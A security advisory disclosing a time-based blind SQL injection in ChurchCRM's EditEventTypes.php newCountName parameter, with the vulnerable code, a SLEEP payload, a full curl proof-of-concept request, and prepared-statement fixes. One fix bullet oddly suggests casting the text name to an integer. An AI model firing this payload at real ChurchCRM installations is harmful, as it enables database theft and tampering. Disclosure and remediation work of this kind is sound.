Severity:
- ⚫ Critical (CWE-89: Improper Neutralization of Special Elements used in an SQL Command)
- A CVE will be assigned once the ChurchCRM team reviews the issue (CVE-2025-1023)

Authorization Required:
- Administrator or a user with permission to list event types
Description
A vulnerability exists in ChurchCRM that allows an attacker to execute arbitrary SQL queries through a time-based blind SQL Injection in the EditEventTypes functionality. The `newCountName` parameter is concatenated directly into an SQL statement without sanitization or parameter binding, allowing an attacker to alter the query and run arbitrary SQL, potentially leading to data exfiltration, modification, or deletion.
Exploiting the SQL Injection

Affected Asset:
http://<server_ip>/EditEventTypes.php

Vulnerable Source Code:

```php
// ...
// Fragment of EditEventTypes.php: the id sliced from Action and the POSTed
// count name are interpolated straight into SQL strings.
$ctid = mb_substr($_POST['Action'], 7);
$sSQL = "DELETE FROM eventcountnames_evctnm WHERE evctnm_countid='$ctid' LIMIT 1";
RunQuery($sSQL);
} else {
    switch ($_POST['Action']) {
        case 'ADD':
            $newCTName = $_POST['newCountName'];   // attacker-controlled, unescaped
            $theID = $_POST['EN_tyid'];
            $sSQL = "INSERT eventcountnames_evctnm (evctnm_eventtypeid, evctnm_countname) VALUES ('$theID','$newCTName')";
            RunQuery($sSQL);
            break;
```

Steps to Reproduce:
- Navigate to the EditEventTypes endpoint: http://<server_ip>/EditEventTypes.php
- Intercept the request using a tool like Burp Suite, or craft a request manually.
- Set the `newCountName` parameter to the following SQL Injection payload: `4' AND (SELECT 6419 FROM (SELECT(SLEEP(5)))PYsF) AND 'KmGS'='KmGS`
- Observe the response time delay, indicating that SQL Injection is possible.
Proof of Concept (PoC):

Exploiting Time-Based Blind SQL Injection

```sh
curl --path-as-is -i -s -k -X $'POST' \
    -H $'Host: <server_ip>' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36' \
    -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8' \
    -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' \
    -H $'Content-Type: application/x-www-form-urlencoded' \
    -H $'Content-Length: 175' -H $'Origin: http://<server_ip>' -H $'Connection: keep-alive' \
    -H $'Referer: http://<server_ip>/EditEventTypes.php' \
    -H $'sec-ch-ua-platform: "Windows"' -H $'sec-ch-ua: "Google Chrome";v="117", "Chromium";v="117", "Not=A?Brand";v="24"' \
    -H $'sec-ch-ua-mobile: ?0' -H $'Priority: u=0' \
    -b $'<CRM-Cookie>' \
    --data-binary $'EN_tyid=1&EN_ctid=&newEvtName=Church%20Service&newEvtStartTime=10:30:00&newCountName=4\'%20AND%20(SELECT%206419%20FROM%20(SELECT(SLEEP(5)))PYsF)%20AND%20\'KmGS\'\=\'KmGS&Action=ADD' \
    $'http://<server_ip>/EditEventTypes.php'
```

Observed Response:
- The request results in a 5-second delay, confirming the SQL Injection vulnerability.
Impact:
- Data Exfiltration: Attackers can dump the database and retrieve sensitive data, such as user credentials and admin tokens.
- Database Manipulation: Attackers can modify, delete, or corrupt important data.
- Remote Code Execution (RCE) Possibility: Depending on the database configuration, this vulnerability could lead to RCE by leveraging database functions to execute OS-level commands.
Recommended Fix:
- Use prepared statements (parameterized queries) to prevent SQL Injection. Example:

  ```php
  $stmt = $pdo->prepare("INSERT INTO eventcountnames_evctnm (evctnm_eventtypeid, evctnm_countname) VALUES (?, ?)");
  $stmt->execute([$theID, $newCTName]);
  ```

- Implement input validation to reject dangerous characters.
- Apply the principle of least privilege to database users to limit the damage from SQL Injection.
- Enforce a data type in PHP for the `newCountName` variable, e.g. cast the value to its expected type (such as `int`) before it is used.
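The fix applied to the whole handler quoted above, as an added example that is not ChurchCRM's code: both the DELETE and the ADD branch use PDO prepared statements, the ids are validated as integers before they reach SQL, and the free-text count name is bound as a string parameter so the reported payload is stored as data rather than changing the query. It assumes `$pdo` is an existing PDO connection, that the deletion Action carries a `DELETE_` prefix before the id (the report only shows the id being sliced from offset 7), a 50-character cap on the count name, and PHP 8 (`str_starts_with`). The usage at the bottom stands up an in-memory SQLite table with the report's column names in place of MySQL so it runs offline.

```php
<?php
// Added example (not ChurchCRM's code): EditEventTypes handler with PDO prepared
// statements. Table and column names are those quoted in the report; the
// 'DELETE_' prefix and the 50-character name cap are assumptions.
declare(strict_types=1);

function handleEventCountAction(PDO $pdo, array $post): string
{
    $action = $post['Action'] ?? '';

    // Deletion: the id is sliced out of Action (as in the original) but must
    // validate as an integer before it is bound to the query.
    if (str_starts_with($action, 'DELETE_')) {
        $ctid = filter_var(mb_substr($action, 7), FILTER_VALIDATE_INT);
        if ($ctid === false) {
            throw new InvalidArgumentException('evctnm_countid must be an integer');
        }
        $stmt = $pdo->prepare(
            'DELETE FROM eventcountnames_evctnm WHERE evctnm_countid = :ctid LIMIT 1'
        );
        $stmt->bindValue(':ctid', $ctid, PDO::PARAM_INT);
        $stmt->execute();
        return 'deleted';
    }

    switch ($action) {
        case 'ADD':
            // The event type id is numeric; the count name is free text. Binding it
            // as a parameter means quotes and SQL keywords inside it stay data.
            $theID = filter_var($post['EN_tyid'] ?? null, FILTER_VALIDATE_INT);
            $newCTName = trim((string) ($post['newCountName'] ?? ''));
            if ($theID === false || $newCTName === '' || mb_strlen($newCTName) > 50) {
                throw new InvalidArgumentException('invalid event type id or count name');
            }
            $stmt = $pdo->prepare(
                'INSERT INTO eventcountnames_evctnm (evctnm_eventtypeid, evctnm_countname) VALUES (:tyid, :name)'
            );
            $stmt->bindValue(':tyid', $theID, PDO::PARAM_INT);
            $stmt->bindValue(':name', $newCTName, PDO::PARAM_STR);
            $stmt->execute();
            return 'added';
        default:
            throw new InvalidArgumentException('unknown Action');
    }
}

// Constructed usage: an in-memory SQLite table stands in for the MySQL table.
// Against MySQL, also set PDO::ATTR_EMULATE_PREPARES => false so the server
// itself binds the parameters.
$pdo = new PDO('sqlite::memory:', null, null, [
    PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
]);
$pdo->exec('CREATE TABLE eventcountnames_evctnm (
    evctnm_countid INTEGER PRIMARY KEY AUTOINCREMENT,
    evctnm_eventtypeid INTEGER NOT NULL,
    evctnm_countname TEXT NOT NULL
)');

// The payload from the report, submitted through the hardened handler.
$payload = "4' AND (SELECT 6419 FROM (SELECT(SLEEP(5)))PYsF) AND 'KmGS'='KmGS";
handleEventCountAction($pdo, ['Action' => 'ADD', 'EN_tyid' => '1', 'newCountName' => $payload]);

$row = $pdo->query('SELECT evctnm_countname FROM eventcountnames_evctnm')->fetchColumn();
echo $row === $payload ? "payload stored verbatim as a name; query unchanged\n"
                       : "UNEXPECTED: stored value differs from input\n";
```

The integer validation on `EN_tyid` and the sliced id covers the two fields the report shows as numeric; the count name is deliberately not filtered for "dangerous characters", since with parameter binding a quote in a name is harmless and rejecting it would break legitimate input such as `O'Brien`.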
Environment:
- Application: ChurchCRM 5.13.0
- Tested on: Provided Docker in release